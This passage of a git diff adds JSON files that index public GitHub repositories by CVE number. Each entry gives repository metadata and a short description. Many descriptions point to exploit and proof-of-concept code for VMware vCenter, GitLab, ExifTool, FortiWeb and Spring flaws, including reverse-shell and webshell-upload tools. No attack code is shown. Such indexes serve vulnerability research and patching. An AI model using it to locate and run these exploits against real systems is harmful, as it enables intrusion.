+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24275308?v=4",
+ "html_url": "https:\/\/github.com\/shmilylty"
+ },
+ "html_url": "https:\/\/github.com\/shmilylty\/cve-2021-22005-exp",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-18T08:18:50Z",
+ "updated_at": "2024-06-25T14:38:13Z",
+ "pushed_at": "2021-12-22T10:32:37Z",
+ "stargazers_count": 183,
+ "watchers_count": 183,
+ "has_discussions": false,
+ "forks_count": 47,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 47,
+ "watchers": 183,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 444978473,
+ "name": "testanull-CVE-2021-22005.py",
+ "full_name": "timb-machine-mirrors\/testanull-CVE-2021-22005.py",
+ "owner": {
+ "login": "timb-machine-mirrors",
+ "id": 49810875,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49810875?v=4",
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors"
+ },
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors\/testanull-CVE-2021-22005.py",
+ "description": "Clone from gist",
+ "fork": false,
+ "created_at": "2022-01-05T23:22:08Z",
+ "updated_at": "2023-04-08T20:15:10Z",
+ "pushed_at": "2022-01-05T23:22:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 505737586,
+ "name": "cve-2021-22005",
+ "full_name": "InventorMAO\/cve-2021-22005",
+ "owner": {
+ "login": "InventorMAO",
+ "id": 43470113,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43470113?v=4",
+ "html_url": "https:\/\/github.com\/InventorMAO"
+ },
+ "html_url": "https:\/\/github.com\/InventorMAO\/cve-2021-22005",
+ "description": "cve-2021-22005vcenter任意文件上传漏洞,可直接上传冰蝎",
+ "fork": false,
+ "created_at": "2022-06-21T07:36:01Z",
+ "updated_at": "2022-06-21T07:37:49Z",
+ "pushed_at": "2022-06-21T07:37:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22006.json b/2021/CVE-2021-22006.json
new file mode 100644
index 0000000000..dbc26cd5a0
--- /dev/null
+++ b/2021/CVE-2021-22006.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 410416072,
+ "name": "CVE-2021-22006",
+ "full_name": "CrackerCat\/CVE-2021-22006",
+ "owner": {
+ "login": "CrackerCat",
+ "id": 17995064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4",
+ "html_url": "https:\/\/github.com\/CrackerCat"
+ },
+ "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-22006",
+ "description": "CVE-2021-22005 - VMWare vCenter Server File Upload to RCE",
+ "fork": false,
+ "created_at": "2021-09-26T01:02:00Z",
+ "updated_at": "2024-06-21T00:09:33Z",
+ "pushed_at": "2023-01-30T10:11:00Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 55,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 55,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22015.json b/2021/CVE-2021-22015.json
new file mode 100644
index 0000000000..8f9e289716
--- /dev/null
+++ b/2021/CVE-2021-22015.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 411962225,
+ "name": "vScalation-CVE-2021-22015",
+ "full_name": "PenteraIO\/vScalation-CVE-2021-22015",
+ "owner": {
+ "login": "PenteraIO",
+ "id": 60603602,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60603602?v=4",
+ "html_url": "https:\/\/github.com\/PenteraIO"
+ },
+ "html_url": "https:\/\/github.com\/PenteraIO\/vScalation-CVE-2021-22015",
+ "description": "Scanner for vScalation (CVE-2021-22015) a Local Privilege Escalation in VMWare vCenter",
+ "fork": false,
+ "created_at": "2021-09-30T07:16:27Z",
+ "updated_at": "2024-02-24T11:42:35Z",
+ "pushed_at": "2023-05-09T12:43:17Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22053.json b/2021/CVE-2021-22053.json
new file mode 100644
index 0000000000..e81cb3db4e
--- /dev/null
+++ b/2021/CVE-2021-22053.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 430315623,
+ "name": "spring-cloud-netflix-hystrix-dashboard-cve-2021-22053",
+ "full_name": "SecCoder-Security-Lab\/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053",
+ "owner": {
+ "login": "SecCoder-Security-Lab",
+ "id": 92973688,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92973688?v=4",
+ "html_url": "https:\/\/github.com\/SecCoder-Security-Lab"
+ },
+ "html_url": "https:\/\/github.com\/SecCoder-Security-Lab\/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053",
+ "description": "Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability CVE-2021-22053",
+ "fork": false,
+ "created_at": "2021-11-21T08:47:56Z",
+ "updated_at": "2023-09-28T11:33:25Z",
+ "pushed_at": "2022-12-15T07:44:59Z",
+ "stargazers_count": 38,
+ "watchers_count": 38,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 38,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 430821052,
+ "name": "CVE-2021-22053",
+ "full_name": "Vulnmachines\/CVE-2021-22053",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/CVE-2021-22053",
+ "description": " CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard template resolution vulnerability",
+ "fork": false,
+ "created_at": "2021-11-22T18:26:16Z",
+ "updated_at": "2023-02-22T15:16:08Z",
+ "pushed_at": "2022-07-26T05:22:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22054.json b/2021/CVE-2021-22054.json
new file mode 100644
index 0000000000..6da5158f3f
--- /dev/null
+++ b/2021/CVE-2021-22054.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 499534375,
+ "name": "CVE-2021-22054",
+ "full_name": "MKSx\/CVE-2021-22054",
+ "owner": {
+ "login": "MKSx",
+ "id": 17793927,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17793927?v=4",
+ "html_url": "https:\/\/github.com\/MKSx"
+ },
+ "html_url": "https:\/\/github.com\/MKSx\/CVE-2021-22054",
+ "description": "Generate SSRF payloads",
+ "fork": false,
+ "created_at": "2022-06-03T14:06:02Z",
+ "updated_at": "2023-07-02T00:18:15Z",
+ "pushed_at": "2022-06-03T19:16:22Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "airwatch",
+ "cve",
+ "cve-2021-22054",
+ "python",
+ "vmware"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22119.json b/2021/CVE-2021-22119.json
new file mode 100644
index 0000000000..e1118c4bfe
--- /dev/null
+++ b/2021/CVE-2021-22119.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 423893864,
+ "name": "oauth-client-exploit",
+ "full_name": "mari6274\/oauth-client-exploit",
+ "owner": {
+ "login": "mari6274",
+ "id": 8080682,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8080682?v=4",
+ "html_url": "https:\/\/github.com\/mari6274"
+ },
+ "html_url": "https:\/\/github.com\/mari6274\/oauth-client-exploit",
+ "description": "Applications that reproduce CVE-2021-22119",
+ "fork": false,
+ "created_at": "2021-11-02T15:16:24Z",
+ "updated_at": "2022-11-09T18:14:17Z",
+ "pushed_at": "2021-11-02T15:17:26Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22123.json b/2021/CVE-2021-22123.json
new file mode 100644
index 0000000000..03141aef18
--- /dev/null
+++ b/2021/CVE-2021-22123.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 397567325,
+ "name": "CVE-2021-22123",
+ "full_name": "murataydemir\/CVE-2021-22123",
+ "owner": {
+ "login": "murataydemir",
+ "id": 16391655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4",
+ "html_url": "https:\/\/github.com\/murataydemir"
+ },
+ "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-22123",
+ "description": "[CVE-2021-22123] Fortinet FortiWeb Authenticated OS Command Injection",
+ "fork": false,
+ "created_at": "2021-08-18T10:54:27Z",
+ "updated_at": "2023-09-28T11:30:39Z",
+ "pushed_at": "2021-08-18T13:19:38Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22145.json b/2021/CVE-2021-22145.json
new file mode 100644
index 0000000000..49c9a9a2a6
--- /dev/null
+++ b/2021/CVE-2021-22145.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 685428734,
+ "name": "CVE-2021-22145-poc",
+ "full_name": "niceeeeeeee\/CVE-2021-22145-poc",
+ "owner": {
+ "login": "niceeeeeeee",
+ "id": 33342959,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33342959?v=4",
+ "html_url": "https:\/\/github.com\/niceeeeeeee"
+ },
+ "html_url": "https:\/\/github.com\/niceeeeeeee\/CVE-2021-22145-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-31T07:56:03Z",
+ "updated_at": "2023-08-31T08:10:17Z",
+ "pushed_at": "2023-08-31T08:10:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22146.json b/2021/CVE-2021-22146.json
new file mode 100644
index 0000000000..8cbaaca045
--- /dev/null
+++ b/2021/CVE-2021-22146.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 388358547,
+ "name": "cve-2021-22146",
+ "full_name": "magichk\/cve-2021-22146",
+ "owner": {
+ "login": "magichk",
+ "id": 17543960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17543960?v=4",
+ "html_url": "https:\/\/github.com\/magichk"
+ },
+ "html_url": "https:\/\/github.com\/magichk\/cve-2021-22146",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-22T06:50:34Z",
+ "updated_at": "2023-09-28T11:29:43Z",
+ "pushed_at": "2021-07-26T16:27:49Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22192.json b/2021/CVE-2021-22192.json
new file mode 100644
index 0000000000..0a0e2ccf2f
--- /dev/null
+++ b/2021/CVE-2021-22192.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 352006763,
+ "name": "CVE-2021-22192",
+ "full_name": "EXP-Docs\/CVE-2021-22192",
+ "owner": {
+ "login": "EXP-Docs",
+ "id": 132466462,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132466462?v=4",
+ "html_url": "https:\/\/github.com\/EXP-Docs"
+ },
+ "html_url": "https:\/\/github.com\/EXP-Docs\/CVE-2021-22192",
+ "description": "CVE-2021-22192 靶场: 未授权用户 RCE 漏洞",
+ "fork": false,
+ "created_at": "2021-03-27T07:09:46Z",
+ "updated_at": "2024-03-25T17:09:20Z",
+ "pushed_at": "2023-01-24T10:35:03Z",
+ "stargazers_count": 36,
+ "watchers_count": 36,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 36,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 360465836,
+ "name": "Gitlab-RCE",
+ "full_name": "PetrusViet\/Gitlab-RCE",
+ "owner": {
+ "login": "PetrusViet",
+ "id": 63145078,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63145078?v=4",
+ "html_url": "https:\/\/github.com\/PetrusViet"
+ },
+ "html_url": "https:\/\/github.com\/PetrusViet\/Gitlab-RCE",
+ "description": "CVE-2021-22192",
+ "fork": false,
+ "created_at": "2021-04-22T09:35:57Z",
+ "updated_at": "2023-09-28T11:27:03Z",
+ "pushed_at": "2021-04-28T04:39:38Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22201.json b/2021/CVE-2021-22201.json
new file mode 100644
index 0000000000..a85aa5b804
--- /dev/null
+++ b/2021/CVE-2021-22201.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 376590691,
+ "name": "CVE-2021-22201",
+ "full_name": "exp1orer\/CVE-2021-22201",
+ "owner": {
+ "login": "exp1orer",
+ "id": 25338973,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25338973?v=4",
+ "html_url": "https:\/\/github.com\/exp1orer"
+ },
+ "html_url": "https:\/\/github.com\/exp1orer\/CVE-2021-22201",
+ "description": "CVE-2021–22201 Arbitrary file read on Gitlab ",
+ "fork": false,
+ "created_at": "2021-06-13T16:30:47Z",
+ "updated_at": "2021-10-22T09:53:12Z",
+ "pushed_at": "2021-06-13T16:55:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-22204.json b/2021/CVE-2021-22204.json
new file mode 100644
index 0000000000..1e00f8c4bb
--- /dev/null
+++ b/2021/CVE-2021-22204.json
@@ -0,0 +1,438 @@
+[
+ {
+ "id": 366482211,
+ "name": "CVE-2021-22204-exiftool",
+ "full_name": "convisolabs\/CVE-2021-22204-exiftool",
+ "owner": {
+ "login": "convisolabs",
+ "id": 92468795,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92468795?v=4",
+ "html_url": "https:\/\/github.com\/convisolabs"
+ },
+ "html_url": "https:\/\/github.com\/convisolabs\/CVE-2021-22204-exiftool",
+ "description": "Python exploit for the CVE-2021-22204 vulnerability in Exiftool",
+ "fork": false,
+ "created_at": "2021-05-11T18:45:07Z",
+ "updated_at": "2024-06-03T05:56:12Z",
+ "pushed_at": "2021-05-20T21:42:43Z",
+ "stargazers_count": 88,
+ "watchers_count": 88,
+ "has_discussions": false,
+ "forks_count": 29,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "exiftool"
+ ],
+ "visibility": "public",
+ "forks": 29,
+ "watchers": 88,
+ "score": 0,
+ "subscribers_count": 9
+ },
+ {
+ "id": 366651752,
+ "name": "CVE-2021-22204",
+ "full_name": "se162xg\/CVE-2021-22204",
+ "owner": {
+ "login": "se162xg",
+ "id": 64580307,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64580307?v=4",
+ "html_url": "https:\/\/github.com\/se162xg"
+ },
+ "html_url": "https:\/\/github.com\/se162xg\/CVE-2021-22204",
+ "description": "exiftool arbitrary code execution vulnerability",
+ "fork": false,
+ "created_at": "2021-05-12T08:51:44Z",
+ "updated_at": "2023-09-28T11:27:36Z",
+ "pushed_at": "2021-05-12T09:09:56Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 369369026,
+ "name": "POC-CVE-2021-22204",
+ "full_name": "bilkoh\/POC-CVE-2021-22204",
+ "owner": {
+ "login": "bilkoh",
+ "id": 43228593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43228593?v=4",
+ "html_url": "https:\/\/github.com\/bilkoh"
+ },
+ "html_url": "https:\/\/github.com\/bilkoh\/POC-CVE-2021-22204",
+ "description": "POC for exiftool vuln (CVE-2021-22204).",
+ "fork": false,
+ "created_at": "2021-05-21T00:14:52Z",
+ "updated_at": "2023-09-28T11:27:53Z",
+ "pushed_at": "2021-05-21T00:17:10Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 391882871,
+ "name": "CVE-2021-22204",
+ "full_name": "PenTestical\/CVE-2021-22204",
+ "owner": {
+ "login": "PenTestical",
+ "id": 57206134,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57206134?v=4",
+ "html_url": "https:\/\/github.com\/PenTestical"
+ },
+ "html_url": "https:\/\/github.com\/PenTestical\/CVE-2021-22204",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-02T09:11:27Z",
+ "updated_at": "2022-07-21T00:41:01Z",
+ "pushed_at": "2021-08-02T13:30:30Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 392061786,
+ "name": "CVE-2021-22204",
+ "full_name": "AssassinUKG\/CVE-2021-22204",
+ "owner": {
+ "login": "AssassinUKG",
+ "id": 5285547,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5285547?v=4",
+ "html_url": "https:\/\/github.com\/AssassinUKG"
+ },
+ "html_url": "https:\/\/github.com\/AssassinUKG\/CVE-2021-22204",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-02T18:56:16Z",
+ "updated_at": "2024-01-19T17:39:12Z",
+ "pushed_at": "2021-10-26T16:51:48Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 424626163,
+ "name": "CVE-2021-22204-Gitlab",
+ "full_name": "ph-arm\/CVE-2021-22204-Gitlab",
+ "owner": {
+ "login": "ph-arm",
+ "id": 35294934,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35294934?v=4",
+ "html_url": "https:\/\/github.com\/ph-arm"
+ },
+ "html_url": "https:\/\/github.com\/ph-arm\/CVE-2021-22204-Gitlab",
+ "description": "Modification of gitlab exploit anything under 13.10",
+ "fork": false,
+ "created_at": "2021-11-04T14:31:02Z",
+ "updated_at": "2022-03-01T17:55:55Z",
+ "pushed_at": "2021-11-04T14:39:45Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 435659288,
+ "name": "CVE-2021-22204-RSE",
+ "full_name": "Asaad27\/CVE-2021-22204-RSE",
+ "owner": {
+ "login": "Asaad27",
+ "id": 54289666,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54289666?v=4",
+ "html_url": "https:\/\/github.com\/Asaad27"
+ },
+ "html_url": "https:\/\/github.com\/Asaad27\/CVE-2021-22204-RSE",
+ "description": "reverse shell execution exploit of CVE 22204",
+ "fork": false,
+ "created_at": "2021-12-06T21:53:55Z",
+ "updated_at": "2021-12-08T18:24:25Z",
+ "pushed_at": "2021-12-08T18:24:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 442784926,
+ "name": "CVE-2021-22204",
+ "full_name": "trganda\/CVE-2021-22204",
+ "owner": {
+ "login": "trganda",
+ "id": 62204882,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204882?v=4",
+ "html_url": "https:\/\/github.com\/trganda"
+ },
+ "html_url": "https:\/\/github.com\/trganda\/CVE-2021-22204",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-29T13:41:35Z",
+ "updated_at": "2022-06-24T09:01:37Z",
+ "pushed_at": "2021-12-29T13:55:37Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 453576046,
+ "name": "CVE-2021-22204",
+ "full_name": "0xBruno\/CVE-2021-22204",
+ "owner": {
+ "login": "0xBruno",
+ "id": 59654121,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59654121?v=4",
+ "html_url": "https:\/\/github.com\/0xBruno"
+ },
+ "html_url": "https:\/\/github.com\/0xBruno\/CVE-2021-22204",
+ "description": "A complete PoC for CVE-2021-22204 exiftool RCE ",
+ "fork": false,
+ "created_at": "2022-01-30T03:11:56Z",
+ "updated_at": "2022-08-05T03:45:13Z",
+ "pushed_at": "2022-01-30T03:17:42Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 461823605,
+ "name": "CVE-2021-22204-exiftool",
+ "full_name": "mr-tuhin\/CVE-2021-22204-exiftool",
+ "owner": {
+ "login": "mr-tuhin",
+ "id": 53522759,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53522759?v=4",
+ "html_url": "https:\/\/github.com\/mr-tuhin"
+ },
+ "html_url": "https:\/\/github.com\/mr-tuhin\/CVE-2021-22204-exiftool",
+ "description": "exiftool exploit",
+ "fork": false,
+ "created_at": "2022-02-21T11:07:19Z",
+ "updated_at": "2024-02-14T16:29:37Z",
+ "pushed_at": "2022-02-21T12:20:15Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 482377691,
+ "name": "exploit-CVE-2021-22204",
+ "full_name": "UNICORDev\/exploit-CVE-2021-22204",
+ "owner": {
+ "login": "UNICORDev",
+ "id": 103281826,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103281826?v=4",
+ "html_url": "https:\/\/github.com\/UNICORDev"
+ },
+ "html_url": "https:\/\/github.com\/UNICORDev\/exploit-CVE-2021-22204",
+ "description": "Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution",
+ "fork": false,
+ "created_at": "2022-04-16T22:49:47Z",
+ "updated_at": "2024-06-10T10:11:26Z",
+ "pushed_at": "2022-06-07T23:09:29Z",
+ "stargazers_count": 35,
+ "watchers_count": 35,
+ "has_discussions": true,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-22204",
+ "djvu",
+ "exiftool",
+ "exploit",
+ "hackthebox",
+ "linux",
+ "penetration-testing",
+ "proof-of-concept",
+ "python",
+ "unicord",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 35,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 640427326,
+ "name": "CVE-2021-22204",
+ "full_name": "Akash7350\/CVE-2021-22204",
+ "owner": {
+ "login": "Akash7350",
+ "id": 104816473,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104816473?v=4",
+ "html_url": "https:\/\/github.com\/Akash7350"
+ },
+ "html_url": "https:\/\/github.com\/Akash7350\/CVE-2021-22204",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-14T03:43:28Z",
+ "updated_at": "2024-05-18T06:57:38Z",
+ "pushed_at": "2023-05-14T04:01:04Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 670638630,
+ "name": "dejavu",
+ "full_name": "battleofthebots\/dejavu",
+ "owner": {
+ "login": "battleofthebots",
+ "id": 122462368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122462368?v=4",
+ "html_url": "https:\/\/github.com\/battleofthebots"
+ },
+ "html_url": "https:\/\/github.com\/battleofthebots\/dejavu",
+ "description": "Challenge based on CVE-2021-22204 where users send a malicious file to a web application to gain RCE",
+ "fork": false,
+ "created_at": "2023-07-25T13:52:01Z",
+ "updated_at": "2023-10-16T10:21:15Z",
+ "pushed_at": "2023-10-11T22:19:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812063180,
+ "name": "CVE-2021-22204",
+ "full_name": "cc3305\/CVE-2021-22204",
+ "owner": {
+ "login": "cc3305",
+ "id": 103961201,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4",
+ "html_url": "https:\/\/github.com\/cc3305"
+ },
+ "html_url": "https:\/\/github.com\/cc3305\/CVE-2021-22204",
+ "description": "CVE-2021-22204 exploit script",
+ "fork": false,
+ "created_at": "2024-06-07T21:57:22Z",
